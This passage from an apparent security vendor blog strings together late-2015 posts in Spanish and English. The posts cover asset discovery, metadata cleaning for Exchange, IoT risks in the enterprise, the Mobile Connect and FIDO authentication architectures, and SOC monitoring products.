ofrecidos por cada una en las direcciones IP del activo, proporcionando información detallada sobre qué servicios de red están siendo ejecutados en cada uno de los sistemas descubiertos y cuáles son las versiones de software que tiene instalados. Detalle de direcciones IP, puertos y software de servidor descubierto SEQ Ilustración * ARABIC Software identificado sobre activo descubierto De esta forma las organizaciones pueden comprobar para cada activo si tiene los programas instalados requeridos con la versión apropiada en función del tipo de sistema y que se encuentre libre de vulnerabilidades conocidas. Una vez que el sistema ha registrado las versiones de software, Vamps permite la notificación personalizable de las nuevas vulnerabilidades de fabricantes que afectan específicamente al software de sus activos. Por ejemplo, podría estar informado de todas las nuevas vulnerabilidades que afecten al activo www.democyberdac.com, que serían las publicadas referentes a software Apache Http Server, PHP, OpenSSL...Este enfoque nos permite pasar de recibir numerosos correos alertando que "Existe una vulnerabilidad en Apache" a vulnerabilidades potenciales sobre activos de la empresa como "El activo www.democyberdac.com se encuentra afectado por la vulnerabilidad x de Apache". Se pueden establecer criterios de configuración de las alertas en base a varios parámetros como la severidad según la métrica CVSS, cuándo ser notificado (diariamente, semanal), o estar informado de las vulnerabilidades que afecten a los productos de una familia concreta, entre otros. Definición de alerta de vulnerabilidad sobre software Apache http server Para cada activo descubierto se puede crear una serie de etiquetas personalizables y atributos como ubicación, propósito, responsable, nivel de criticidad, etc. Listado de etiquetas personalizadas por la empresa Esto le permitirá una gestión más efectiva, a través de listados o informes de vulnerabilidades sobre activos con la clasificación definida por la empresa, facilitando la obtención de métricas que respalden decisiones operativas y estratégicas. Detalle de filtro utilizando etiquetas definidas por cliente Creación de informe de seguimiento sobre activos con etiquetas creadas por cliente Una vez finalizado el descubrimiento de activos, se reinicia este proceso de forma continua y recursiva con la información obtenida, lo que proporciona al cliente una visión actualizada del inventario de sus activos autorizados, desautorizados y aquellos que ha descuidado su existencia accesibles desde el exterior, independientemente de su tamaño. También te puede interesar: * Gestión de vulnerabilidades con pentesting persistente, una visión global (I) Víctor Mundilla victor.mundilla@11paths.com
18 de diciembre de 2015
Metashield for Exchange soon to be available. How does it work?
Metashield for Exchange stacks up to our currently offered server-side metadata cleaning solutions and broadens the flexibility and customization options that we offer companies to get rid of sensitive information and metadata leaks. A plugin for Outlook is already offered but depending on the needs and architecture of an organization’s servers it may opt for a centralized Exchange-specific solution. In this case, it will be easier for the end user because the cleaning process is completely transparent and occurs asynchronously on the server. So where exactly does Metashield For Exchange fit in the Exchange message pipeline? There are several roles that run in Exchange servers such as Mailbox, Client access and Edge Transport server roles. Metashield For Exchange is installed to Mailbox servers as a plugin-like "Routing Agent" and resides more specifically in the "Transport" service. Once condivd, instances of Metashield For Exchange are then spawn according to outgoing messages. These instances bind to the "OnSubmittedMessage" event of the message delivery pipeline and perform the cleaning process of the document asynchronously using the "Metashield Engine" service. As soon as the document is clean it’s sent forth to the pipeline until its destination. This way we ensure that every single outgoing document is metadata-free when reaching our organization mailserver’s outer boundaries. Source: https://msdn.microsoft.com/en-us/library/office/dd877035(v=exchg.150).aspx However there are cases that a certain email attachment should not be cleaned and metadata should be maintained. For this purpose the administrator can define advanced rules to skip those messages and leave them "unclean". Configuring Metashield whitelist As for customizable options, a caching layer is available and configurable as memory or file based. Considering the case of forwarded message chains containing attachments, the use of a cache may result in significant performance boost. We reccomend its use. Using cache in Metashield for Exchange Of course, the profile and template based cleaning system known from other "Metashield" products is maintained. For the sake of example, let’s see a real world configuration where documents should include information about a company but all other metadata is cleaned: A step by step example First of all a new template with the desired actions needs to be created. This one will be a simple one for demonstration purposes. Creating a new template After that, the newly created template should be assigned to the desired extensions or extension families. Add the template to a profile Upon applying the configuration "Metashield" will start cleaning all the newly condivd extesions and will include the company information that we’ve condivd in the template. That simple. Overall we hope that Metashield For Exchange contains everything that a System administrator concerned about security needs to prevent metadata leakage in corporate emails, while maintaining usability and good performance.
16 de diciembre de 2015
IoT - The new security headache for the enterprise IT department?
2015 could prove to be the year that enterprise adoption of BYOD takes a step further, and evolves into BYOIoT. Several reports (i) have already predicted the rise, spurred on by the popularity and proliferation of wearable devices in the workplace. What’s essential is that IT departments are aware of how to manage the resulting security and ecosystem challenges this will bring. The great benefit of IoT is that connected devices are able to interpret and interact seamlessly with the networked environment around them – proving seamless usability and convenience for the end user. The issue for the IT department is that any connected device can theoretically collect and access sensitive information purely because they’re located on the company’s premises. Similarly, since they are usually connected to the corporate network, they can not only exchange data with internal systems but also with external servers. In many cases internal data must be protected, and IT departments will want to control what sensitive information is accessed beyond its network. There is no doubt that connected devices allow employees to be more efficient in their daily operations but are companies fully aware about the security risks that their use also involves? The potential for security breaches increases with the uptake of IoT polices in the workplace. What is disconcerting is that IT departments often have little or no control over new devices connecting to the network. This has been backed up by a recent study (ii) published by OpenDNS which found that IT professionals are often completely unaware of the presence and prevalence of IoT devices on their corporate networks. This apparent lack of control contrasts with a 2013 Forrester (iii) study which stated that security concerns are the main reason businesses are slowing down the incorporation of workplace IoT technologies. This surely begs the question, if security is considered such an important element, why aren’t special measures being put into place? Perhaps the answer lies in the ambiguity in defining what an IoT device is. To get a hand on the solution IT departments must first identify the risks, which are as follows: IoT devices are a new remote attack vector for security exploits. Devices are not designed in line with individual business security requirements and cannot be updated easily to conform with corporate network policies. They often use external clouds beyond the control of IT departments. Without the implementation of traffic control measures, internal data risks being compromised. Users tend to consider these devices as toys and are not aware of the security implications that their use has on a corporate network. The solution for IT departments can be neatly surmised in one word… visibility. The infiltration of IoT devices in the enterprise is clearly underway, as such companies should review their current policies to mitigate potential risks, and once identified put new policies into action where necessary. Most security experts surveyed in the OpenDNS report rely on measures relating to network design and deployment to contain threats, but is it enough? In our point of view, these measures are simply necessary but not wholly sufficient. We propose two approaches. Firstly, we consider focusing on the terminal absolutely necessary. This approach not only identifies all the devices that are within the company premise, but also catalogues and monitors them in order to meet corporate security guidelines. It’s a similar approach to that already undertaken in Mobile Device Management solutions and BYOD policies. It is no coincidence that MDM vendors consider IoT as the next big challenge for their organisations (iv). MDM platforms have grown from a core set of rules associated to the use of smart phones at work to the complete management of any device, including tablets, laptops and even electronic ink readers. With the introduction of IoT and wearable devices, the next logical step is to implement new functionalities to manage all these devices remotely. There is no doubt that a promotion of industry standards will make the collaboration among different device providers easier to manage. In addition, it is important that these assets are included within the scope of security audits performed internally by company’s IT department. Secondly, the approach from the network side should relate to traffic behavior and subsequent analysis. Think of like this, when facing an unknown illness, the best way for a doctor to work out a medication is to identify the symptoms. Everything that is outside normal patterns is likely to be harmful and should be investigated. By examining network traffic using big data matching tools it becomes possible for the IT department to construct behavior models capable of discerning anomalous situations. In this way they can identify new devices, connections to unknown IP addresses, suspicious traffic or strange commands. IoT is already within the enterprise environment, and the only option for companies is to evolve and adapt their security practices accordingly. Ignoring the threat will not make it go away, and IT departments need to be on the front foot when it comes to identifying and mitigating against risk. After all, what is not known cannot be secured. i 'Bring Your Own Internet of Things' coming to businesses in 2015 ii The 2015 Internet of Things in the Enterprise Report iii 'Mapping The Connected World' by Christopher Mines iv IoT in the E: How the Internet of Things Will Transform the Enterprise v Also it can interest you: BANDS: Detección proactiva de amenazas en infraestructuras críticas Qué hemos presentado en el Security Day 2015 (III): un combinado de Tacyt y Sinfonier Francisco Oteiza francisco.oteiza@11paths.com
10 de diciembre de 2015
IoT en la empresa. El nuevo rompecabezas para los departamentos IT.
Durante los últimos años, diversos informes (i) han advertido acerca de la inminente irrupción de cientos de terminales Internet Of Things (IoT) en la empresa, y específicamente señalan 2015 como el año en el que esto será una realidad. Estos terminales IoT son capaces de interpretar el contexto físico, así que al estar ubicados dentro de la empresa recolectan información relevante, que en muchos casos debe ser protegida. Al mismo tiempo, puesto que suelen estar conectados a la red corporativa, se intercomunican con el resto de sistemas y también con servidores externos. No cabe duda de que estos dispositivos permiten a los empleados ser mucho más eficientes en sus operaciones diarias pero, ¿son las empresas conscientes de estos riesgos de seguridad que su uso también conlleva? La realidad es que las potenciales brechas de seguridad se incrementan con la introducción de dispositivos IoT en la empresa, y lo que resulta más desconcertante es que los departamentos de IT no tienen control sobre ellos. Un reciente estudio publicado por OpenDNS donde se analiza la prevalencia dispositivos IoT en redes corporativas y sus potenciales riesgos apunta en la misma dirección: los profesionales de IT de las empresas no son conscientes de la presencia de dispositivos IoT en sus redes. Esta situación de aparente descontrol contrasta con un estudio de Forrester (ii) de 2013 donde se constata que la preocupación por la seguridad es el freno a incorporar tecnologías IoT. Entonces, si la seguridad se considera un elemento tan importante, ¿por qué no se toman medidas? Quizá la respuesta se encuentra en la ambigüedad a la hora de definir qué es un dispositivo IoT y cuáles son sus funcionalidades avanzadas. En resumen, los riesgos de la actual situación son los siguientes: Los dispositivos IoT son un nuevo vector de ataque para exploits remotos. No se diseñan teniendo en cuenta requisitos de seguridad y no cuentan con actualizaciones. Frecuentemente, se sirven de clouds externas que escapan del control de los departamentos IT. Sin unas medidas de control del tráfico, los datos pueden verse comprometidos. Los usuarios tienden a considerar estos dispositivos como simples juguetes y son conscientes de las implicaciones de seguridad que su uso conlleva en una red corporativa. Los puntos anteriores se resumen en un concepto: VISIBILIDAD. Una vez que constada la inevitable infiltración de dispositivos IoT en la empresa, es necesario identificar qué acciones deben acometerse para mitigar los posibles riesgos. La mayoría de expertos de seguridad encuestados en el informe de OpenDNS confían en las medidas desplegadas en la red para contener esta amenaza, pero ¿es suficiente? Somos de la opinión que se necesita algo más. Proponemos dos aproximaciones. La primera centrada en el terminal. Consideramos absolutamente necesario identificar todos los dispositivos que están dentro de la empresa, los propios y los de los empleados, catalogarlos y monitorizarlos para que cumplan las directrices de seguridad. Es una aproximación similar a la que supuso el Mobile Device Management y las políticas BYOD. No es una casualidad que las compañías de MDM consideran a IoT el siguiente gran reto para sus organizaciones (iii). Las plataformas MDM han crecido desde un conjunto básico de reglas relacionadas con el uso de los teléfonos inteligentes en el trabajo a una gestión completa de cualquier tipo de dispositivo, incluyendo tabletas, ordenadores portátiles e incluso lectores de tinta electrónica. Y ahora con la introducción de ponibles y dispositivos. IoT, el siguiente paso lógico es el de implementar nuevas funcionalidades que permitan gestionar estos dispositivos remotamente y con facilidad, asumiendo la dificultad que entraña la fragmentación de plataformas. No cabe duda de que la promoción de estándares hará más sencilla la colaboración entre los diferentes proveedores. Además, es importante, que estos activos se incluyan dentro del alcance de las auditorías de seguridad que se realizan en la compañía, siendo el pentesting persistente la estrategia ideal para analizar los grandes volúmenes de dispositivos que forman parte del ecosistema IoT de las empresas. Por otro lado, la aproximación desde la red a estos nuevos escenarios debe ir encaminada hacía la implantación de sistemas de análisis de comportamiento de tráfico. Frente a una enfermedad desconocida la solución de la medicina es identificar los síntomas, todo aquello que está fuera de la normalidad es susceptible de ser dañino y debe ser investigado. Examinando el tráfico de red mediante herramientas de correlación de big data es posible construir modelos de comportamiento y a partir de entonces se trata de detectar situaciones anómalas. De esta manera, se podrá identificar: los nuevos dispositivos, las conexiones con IPs desconocidas, frecuencias de tráfico sospechosas o comandos extraños. Nos referimos a una solución similar al proyecto BANDS para sistemas SCADA basado en Sinfonier (iv): BANDS es un sistema de monitorización y detección de intrusión que detecta los eventos inusuales, tanto ataques cibernéticos como errores operativos, y logra este objetivo modelando patrones de compartimiento por medio de la monitorización de todo el tráfico de red en tiempo real. BANDS hace acopio de las tramas IP que intercambian los dispositivos de la red para extraer información de ellas. BANDS no busca la amenaza en sí, que puede haber mutado y ser irreconocible, sino las repercusiones que esta tiene sobre el sistema SCADA. IoT ya está dentro en la empresa, así que no queda otra que tomar el control. Aquello que no se conoce no se puede securizar. i 'Bring Your Own Internet of Things' coming to businesses in 2015 ii 'Mapping The Connected World' by Christopher Mines iii IoT in the E: How the Internet of Things Will Transform the Enterprise iv También te puede interesar: BANDS: Detección proactiva de amenazas en infraestructuras críticas Qué hemos presentado en el Security Day 2015 (III): un combinado de Tacyt y Sinfonier Francisco Oteiza francisco.oteiza@11paths.com
10 de diciembre de 2015
Inside Mobile Connect (I)
This is the first of a series of technical articles about the Mobile Connect architecture and the different components that make it up. But, hold on a second… what is Mobile Connect about? Mobile Connect is a mobile centric solution that aims for MNOs (Mobile Network Operator) to become a trusted identity service provider to third party providers. However, Mobile Connect is not only a new way to authenticate users in the mobile network. Moreover, it provides a way to link the digital and real identity of a person and protect their data, giving them back the control for sharing this information when, where and who with. MobileConnect takes advantage of the MNO assets such as the mobile device and the SIM card. Thanks to these assets the MNO can almost always reach the user and send a challenge to authenticate them. In that way, the user’s device turns into a kind of addressable support that keeps the user identity that in turn can be validated by means of different authenticators or different ways to authenticate the user. These different ways to authenticate users provide different validation security levels. This is the so called Level of Assurance (LoA) that describes the degree of confidence in the authentication process. In short they provide certain assurance that the user who is being authenticated is who they claim to be. Mobile Connect Logical Architecture (Telefonica Implementation) Note that Mobile Connect is an interoperable solution. Therefore it must work with any MSISDN from all the MNOs onboard in the Mobile Connect ecosystem. This is accomplished using a discovery process that occurs in a previous phase to the authentication process. The aim of the discovery process is to find the Identity Provider the MNO user belongs to, and redirect them to the MNO Mobile Connect implementation. The div above shows a very high level architecture of the Telefónica Mobile Connect system, but it does not give us too much information. It seems that there are a set of boxes that you can combine and voilá! you have an implementation of Mobile Connect, well... It is a no brainer that it cannot be so easy, right? Don’t worry, in the next section we are going to try to explain the main functionality of each component in the architecture and its role in the mobile connect authentication process flow. Telefónica Mobile Connect Architecture Our Mobile Connect implementation is based on a set of microservices that in turn make up larger components or subsystems which each have a specific role (see div above). You can distinguish three main functionalities in Mobile Connect: The Identity Gateway, the brain of Mobile Connect, offers the interface for the Service Providers to be integrated in Mobile Connect. The Authenticators, provide user validation. The Data Gateway gives the user’s attributes. Mobile Connect interface to Service Providers follows the Authorization Code Flow of the OpenID Connect protocol, where Service Providers act as the RP-Relay parties in the OIDC protocol. Abstract of the OpenID Connect protocol steps Identity Gateway (ID) The Identity Gateway (aka ID-GW) server is a component that can be broken down into a set of individual components. These components meet the functionality of Identity and Access Management along with the functionality to control and protect the resources that show the attributes that can be shared. OIDC AuthServer It is the core component that implements the OpenID Connect protocol as per the OIDC Mobile Connect Profile. It shows the Authorization and Token endpoints. It receives the authentication request, checks if the client (service’s app) is allowed to request the claimed scopes and, in such event it sends the request to the authenticator selector. In addition, in the case of successful authentication, it generates the authorisation_code and the access_token, along with the id_token server. Authenticators Routing Subsystem This component is called by the OIDC server during the authentication process. It selects the right authenticator based on the context in the request (e.g. LoA), routing policies, etc. and prompts the user to provide their credentials where appropriate. Token Manager This component creates the id_token, access_token and the authorisation_code in the auth_code flow. It also offers an API to query the information associated to an access_token. Access Gateway The Access Gateway shows the UserInfo endpoint. It aims to protect access to the real UserInfo resource showed by the back-end. The Access Gateway acts as a proxy that receives the request from the service provider, checks the access_token against the Token Manager to determine the client granted scopes. If the client has the necessary scopes to access the requested resource and the request upper limit has not been reached (traffic throttling), the Access Gateway routes the request toward the Data GW providing the granted scopes. Provision This component offers an API to provide any data that the ID-GW needs to carry out the different tasks for which it is intended to: the scopes, products (set of scopes for different grant types), devs, apps and APIs. Users This component shows an HTTP REST API to manage the provision of the Mobile Connect users. It will be used to register, update users, etc. Authenticators These components represent an abstraction layer that allows the ID Gateway subsystem to talk to the different authenticators in the MNO. All the Mobile Connect authenticators are Mobile Centric authenticators, that is to say, all of them authenticate the end users interacting with their Mobile phone. Authentications using Mobile Connect SMS+URL In the next few paragraphs we describe some of the most common authenticators used in Mobile Connect, taking into account that a big list of them can be integrated in the solution. SMS based authenticator SBA sends a SMS to a mobile phone number. This SMS should have a code (OTP), a link or both in order to authenticate the user. OTP: sends an One Time Password in the SMS that must be validated in the form entry. URL: sends a URL in the SMS that must be clicked by the user to be authenticated. OTP+URL: sends an OTP together with a URL. The user can submit the OTP in the form entry or click the URL to be authenticated. MSSP (Mobile Signature Service Provider) This component is the server side of the SIM Applet based authenticator. It can deal with both LoA2 and LoA3 authentications, by sending a challenge using a "class 2" binary 3.48 SMS to the end user’s SIM. This message reaches the SIM directly without any possibility to be intercepted by any application in the mobile phone. Then the SIM wakes up an applet asking the user for consent using "click-ok" or by a PIN/Personal Code. Once user verification is done, the applet returns an authenticated response back to the MSSP. The MSSP validates the response and gives back success or error. It is worth it to point out that all messages between the MSSP and the SIM are end-to-end encrypted. FIDO Authenticator This component implements a FIDO Server authenticator which will send a challenge to authenticate the user by a biometric authenticator in their mobile phone. Remark: these are some of the authenticators that can be used to authenticate user in Mobile Connect. However, as one of the key requirements of Mobile Connect is to be able to authenticate the end user irrespective of the underpinned authenticator, it needs to have a flexible way to integrate the ID-GW with the different kind of authenticators that show different APIs in turn. To achieve this objective, an adaptor (based on redirections) has been built per every authenticator to communicate it with the ID-GW. Data GW (Data Gateway) This component will be connected to the different sources in the MNO or to potential 3rd parties. It gathers all the attributes that will be showed in the UserInfo endpoint and probably other future info endpoints with extra information.
7 de diciembre de 2015
Prevención y detección de incidentes de seguridad con Security Monitoring
Según el informe “Security of virtual infrastructure. IT security risks special report series [2015]”, se indica que el coste de una brecha de datos oscila entre 26.000 y 60.000 USD según el tipo de infraestructura sobre el cual se produce la incidencia de seguridad. La detección y prevención de incidentes de seguridad requiere dedicación de personal experta en las empresas con el apoyo de soluciones y herramientas tecnológicas para resultar eficiente. Esto implica invertir recursos en seguridad de la información, recursos que muchas veces escasean en las compañías. Te presentamos Security Monitoring, nuestra solución para el control de la actividad TI y de seguridad de una empresa. Security Monitoring pertenece a nuestra familia de soluciones de Gestión y Gobierno de la Seguridad junto con SandaS y SandaS GRC. Security Monitoring está basada en tecnología de Logtrust, y ofrece de forma automática una mejor previsión y detección de posibles riesgos de seguridad, con notificaciones, alertas e informes de actividad. Todo ello resultando en una optimización en la utilización de los recursos existentes y futuros de la empresa sin comprometer la eficiencia en la labor de prevención de posibles incidentes de seguridad de la información. Elige tu plan Security Monitoring se adapta a las necesidades específicas de cada empresa, desde aquellas que no tienen responsables de TI hasta las que gestionan su propia seguridad con equipos especializados. Cada uno de los planes : Controla tu presencia web: informes con indicadores que muestra la percepción de la calidad de un visitante al acceder a la web de la compañía Controla tu IT*: monitorización e informes de actividad de equipos de TI (servidores web/ficheros/etc.) y workstations. Controla tu Seguridad**: monitorización y alertas de dispositivos de Seguridad (FW, UTM, Antivirus, etc.). Gestiona tu Seguridad***: personalización de informes y alertas para ajustarse a las necesidades específicas de seguridad y de negocio de la empresa. Una herramienta de análisis de datos de actividad. * Esta versión incluye el plan básico Controla tu presencia web. ** Esta versión incluye el plan intermedio Controla tu presencia web y Controla tu IT. *** Esta versión incluye el plan avanzado Controla tu presencia web, Controla tu IT y Controla tu Seguridad. Adicionalmente existe la posibilidad de disponer del módulo Log Management que almacena los logs 2 años y ofrece capacidades de creación de informes y análisis forense sobre estos directamente desde la interfaz web, todo ello intuitivo y eficiente. Beneficios Control. Conoce en tiempo real la actividad en la infraestructura de la empresa mediante informes e indicadores predefinidos (personalizados) con notificaciones y alertas Eficiencia. Obtén de información de forma automática liberando los recursos de la empresa para las tareas de alto valor. Ayuda a la toma de decisiones de negocio gracias a la información y conocimiento real y actual. Uso sencillo. Acceso a través de un portal web con interfaz gráfico sencillo e intuitivo que ofrece información en tiempo real a través de notificaciones e informes de actividad de los equipos de la empresa que junto con un módulo de Dashboards personalizados y Log Management completa un servicio de monitorización de TI y seguridad para empresas que necesitan entender el comportamiento de la actividad en su infraestructura TI y de seguridad. Contacta con nosotros para más información. David Martín Lindstrom david.martinlindstrom@telefonica.com
3 de diciembre de 2015
Una visión más detallada de SandaS
SandaS es el producto que hemos desarrollado en ElevenPaths para dar respuesta a los retos a los que se enfrentan quienes tienen la responsabilidad de gestionar la seguridad lógica de una organización. El primer reto para la gestión de la seguridad es detectar los incidentes de seguridad en el menor tiempo posible. Las herramientas básicas para este objetivo son los SIEM (Security Information and Event Management), que recogen la información de los sistemas y las herramientas de seguridad, la normalizan y la correlan para detectar dichos incidentes. El mantenimiento y operación de un SIEM es una actividad que requiere una constante atención y ajuste para que sea eficaz. SandaS CA es el módulo de SandaS que se integra con el SIEM y lo complementa con: Procesamiento de la información que recibe el SIEM con un conjunto de algoritmos propios que permiten detectar actividades que pueden pasar desapercibidas para estos. Estos algoritmos no sólo procesan la información obtenida localmente, sino que añaden información agregada de todos los clientes así como información externa procedente de nuestras fuentes de ciberseguridad para conseguir mayor fiabilidad en la detección. Generación de las correspondientes alertas, que son inyectadas al SIEM para un tratamiento unificado de las mismas. Recolección de las alertas del SIEM, tanto por su correlación nativa como las generadas por SandaS, para su tratamiento automatizado mediante el módulo SandaS RA. Recolección de datos agregados que se mostrarán en el Dashboard en forma de indicadores y métricas. SandaS CA se instala típicamente en la misma red local del SIEM, ya que requiere acceso directo a este. Dispone de un SDK de integración para construir los conectores que permiten la integración con el SIEM, y ya hay conectores desarrollados para los SIEMs de Alienvault, HP Arcsight e Intel Security. Una vez detectado un incidente, el siguiente paso es categorizarlo de una forma homogénea, asignarle una criticidad acorde con la que le da cliente según los elementos y el a los que afecta, notificar a los actores relevantes para su tratamiento y resolución, y ejecutar acciones de resolución o remediación. Para cubrir de forma automática toda esa actividad se ha creado SandaS RA. SandaS RA implementa un flujo de procesamiento que recoge las alertas y notificaciones en general, y en función de los parámetros de la alerta y de reglas definidas por el usuario (un operador del SOC) le asigna una categoría y una criticidad. Las alertas repetidas son agrupadas, para evitar repetir las siguientes fases sin necesidad. A continuación se realizan los procesos de notificación que se hayan configurado para esa alertas, que pueden consistir en la apertura de un caso en el sistema de ticketing del SOC y/o el sistema de ticketing del cliente, el envío de correo con plantillas configurables o avisos por SMS. También se pueden lanzar acciones automáticas de resolución o remediación, como bloqueos de IPs o URLs en los cortafuegos, IPS o proxy web del cliente, cuando están gestionados desde el mismo SOC. Sandas RA cuenta con interfaces para la integración con los sistemas de notificación y con los conectores que implementan las acciones de respuesta. Las alertas ya categorizadas y en su caso la información de los tickets creados para el seguimiento de los incidentes son enviadas a nuestra plataforma de Seguridad Global, basada en tecnologías de Big Data con productos como Sinfonier, nuestra tecnología para la detección de ciberamenazas basada en el procesamiento de información en tiempo real, para su almacenamiento y visualizar toda esa información relevante tanto para el cliente como para la propia operación en un portal (SandaS Dashboard), que muestra en tiempo real información relevante de seguridad: alertas, incidencias, tickets, SLAs y KPIs. Con todos estos componentes, SandaS permite agilizar y dar una visibilidad completa de la gestión que realiza un SOC en las tareas de monitorización de la seguridad de una organización, y se convierte en el pilar para la prestación de los servicios de seguridad gestionada. Enrique Díaz SandaS Technical Lead
25 de noviembre de 2015
Autenticación fuerte con FIDO y Mobile Connect (y II)
En ElevenPaths llevamos trabajando ya algún tiempo en Mobile Connect, una iniciativa que permite a los usuarios autenticarse en sus servicios online usando su teléfono móvil. Los usuarios pueden conectarse a sus servicios sin passwords, simplemente usando su móvil, independientemente del canal que utilice para acceder al servicio. En el capítulo de hoy os contamos cómo es la experiencia de usuario y cómo funciona a través de FIDO y Mobile Connect. Veamos cómo. Experiencia de usuario La FIDO Alliance dispone de dos conjuntos de especificaciones que se corresponden con dos experiencias de usuario: UAF (Universal Authentication Framework) o experiencia de usuario sin contraseña: El usuario en esta experiencia registra el dispositivo en el servicio usando el mecanismo de autenticación en el dispositivo local, por ejemplo con su huella dactilar. Una vez registrado, el usuario siempre que necesite autenticarse en el servicio online, solo tendrá que utilizar su huella dactilar. El usuario no tendrá que insertar ninguna password en ningún momento. Además esta experiencia permite combinar varios mecanismos de autenticación como la huella dactilar + PIN. U2F (Universal Second Factor) o experiencia de usuario con segundo factor. Esta experiencia permite a los servicios incrementar la seguridad de la infraestructura de acceso con password, añadiendo un segundo factor. En este caso el usuario se accede con su usario y password como siempre. El servicio le mostrará al usuario que debe presentar un segundo factor. Este segundo factor permite al servicio usar contraseñas más simples sin comprometer la seguridad. ¿Qué hace que FIDO sea diferente? FIDO es diferente a otras especificaciones porque separa el protocolo de autenticación entre el cliente y el servidor de la verificación local del usuario que se hace en el dispositivo de autenticación. Este protocolo permite a los servicios integrarse de una vez y de forma universal con todos los dispositivos de autenticación que cumplan el estándar, garantizando la privacidad del usuario y de una forma segura. Por otro lado, FIDO proporciona un conjunto de estándares para definir en el cliente una interfaz común y mecanismos para permitir a cualquier dispositivo de autenticación integrarse en este cliente de manera sencilla, como si de un “plugin” se tratara. El cliente puede venir preinstalado en el cliente, bien en el propio OS o en el navegador. Los diferentes dispositivos de autenticación (biométricos, basados en PIN, etc.) se conectan al cliente mediante una interfaz también estandarizada por las especificaciones FIDO. Mobile Connect y FIDO Mobile Connect admite varios tipos de autenticadores, con diferentes niveles de seguridad y son los servicios online los que deciden el tipo de autenticador que requieren para acceder a sus servicios. De esta manera, vemos que Mobile Connect comparte muchos objetivos con FIDO: Objetivo 1: conseguir que los procesos de autenticación sean más simples y seguros Objetivo 2: proporcionar mecanismos de autenticación de doble factor Objetivo 3: definir un framework donde sea sencillo incorporar nuevos autenticadores a modo de plugins, siendo sencillo incorporar autenticadores que ofrezcan distintos niveles de seguridad, tanto existentes como nuevos que puedan surgir en el futuro. El beneficio de integrar FIDO en Mobile Connect es entonces obvio, pues permitiría incluir cualquier autenticador compatible con la especificación para ser utilizado como mecanismo de autenticación Mobile Connect. Pero no olvidéis que Mobile Connect no es sólo la autenticación sino que va más allá proporcionando atributos de identidad a través de OpenID Connect. Estos atributos pueden proporcionar información contextual sobre el usuario que unido a la autenticación permite al servicio online obtener una seguridad aún mayor. Así que si tienes la suerte de tener un Samsung S6, sabed que su sensor de huella dactilar es compatible con FIDO y en breve podréis usarlo en Mobile Connect para conectaros a vuestros servicios online. * Autenticación fuerte con FIDO y Mobile Connect (I) También te puede interesar: * Mobile Connect: el nuevo estándar en autenticación digital * Introducing Mobile Connect - the new standard in digital authentication * How Telefónica collaborates with the GSMA to define a project use case scenarios using lean startup”? Cristina Díaz cris.diaz@11paths.com Juan Fabio García juanfabio.garcia@11paths.com Miguel García miguel.garcialongaron@11paths.com
20 de noviembre de 2015
Autenticación fuerte con FIDO y Mobile Connect (I)
Hoy en día la mayoría de los servicios utilizan un modelo de autenticación fuerte para autenticar a sus usuarios. Los bancos, por ejemplo, usan diferentes técnicas de autenticación fuerte para autenticar a sus clientes y autorizar las operaciones bancarias. La autenticación fuerte es una manera de asegurar que la persona que se identifica en un sistema es quien dice ser y se basa en tres factores básicos: Algo que tiene: credencial, OTP, tarjeta magnética Algo que sabe: clave, PIN, preguntas sobre tú identidad Algo que se es: huella dactilar, reconocimiento facial, iris, voz o incluso tu firma. Hablamos de autenticación fuerte cuando un sistema usa al menos dos de los tres factores básicos, de modo que si uno de los factores se encuentra comprometido todavía existe un segundo factor que le garantiza la seguridad. Sin embargo, las técnicas de autenticación fuerte utilizadas hoy en día carecen en muchos casos de la usabilidad necesaria. Véase el ejemplo de las tarjetas de coordenadas. ¿Qué es FIDO? La FIDO (Fast IDentity Online) Alliance es un consorcio de más de 150 empresas que pretende reanalizar y rediseñar la autenticación de los servicios online creando estándares abiertos. El objetivo de esta alianza es afrontar el problema no sólo de los usuarios a la hora de crear y recordar sus contraseñas, sino también eliminar la falta de interoperabilidad que actualmente existe entre los distintos mecanismos de autenticación fuerte. El consorcio incluye compañías de envergadura como Google, Microsoft y Samsung. Microsoft anunció que su nuevo Windows 10 tendrá soporte a FIDO. Y en el caso de Samsung, su terminal Samsung Galaxy S6 incorpora un sensor de huella dactilar compatible también con FIDO. Los miembros de la FIDO Alliance comparten tecnología y colaboran en la elaboración de estándares para conseguir que los métodos de autenticación fuerte sean interoperables, más seguros, privados y más fáciles de usar que las passwords. El propósito de FIDO es conseguir que sus especificaciones engloben una amplia gama de tecnologías de autenticación, incluyendo las biométricas como las huellas dactilares, el iris etc., pero también otros mecanismos de autenticación existentes como TPMs, USB security tokens o smart cards. ¿Cómo funciona FIDO? Las especificaciones de FIDO utilizan un modelo centrado en el dispositivo. La idea fundamental que persigue la alianza es separar el protocolo de autenticación del mecanismo de verificación de la identidad del usuario. De esta manera, estandarizando el protocolo de autenticación, se consigue garantizar la interoperabilidad, dejando la verificación del usuario como algo intrínseco al propio dispositivo de autenticación. Los protocolos de autenticación definidos utilizan como base la criptografía asimétrica. Durante la fase de registro, el dispositivo de autenticación genera una clave privada, y envía la pública al servidor, junto con el identificador del usuario. Previo a la generación de la clave, el dispositivo de autenticación verifica al usuario mediante la huella dactilar, un PIN o algún otro mecanismo. Para autenticar al usuario, el dispositivo firma un reto que le envía el servidor con la clave privada que generó durante el registro. Previo a la firma del reto, el dispositivo podrá verificar localmente la identidad del usuario mediante un botón, un PIN, biometría o incluso una combinación de ambas. Tanto en el registro como en la autenticación, la información biométrica o el PIN usado en la verificación local del usuario nunca abandona el dispositivo de autenticación local. Otra característica importante de FIDO es que está diseñado para garantizar la privacidad del usuario. Los protocolos están definidos de manera que no proporcionan ningún tipo de información sobre el usuario que permita a uno o varios servicios colaborar y hacer un seguimiento del usuario a través de los servicios. En el próximo capítulo veremos qué hace que FIDO sea diferente y su integración con Mobile Connect. * Autenticación fuerte con FIDO y Mobile Connect (II) Cristina Díaz cris.diaz@11paths.com Juan Fabio García juanfabio.garcia@11paths.com Miguel García miguel.garcialongaron@11paths.com
18 de noviembre de 2015
Estudio: Sobreexposición de credenciales de Amazon en apps
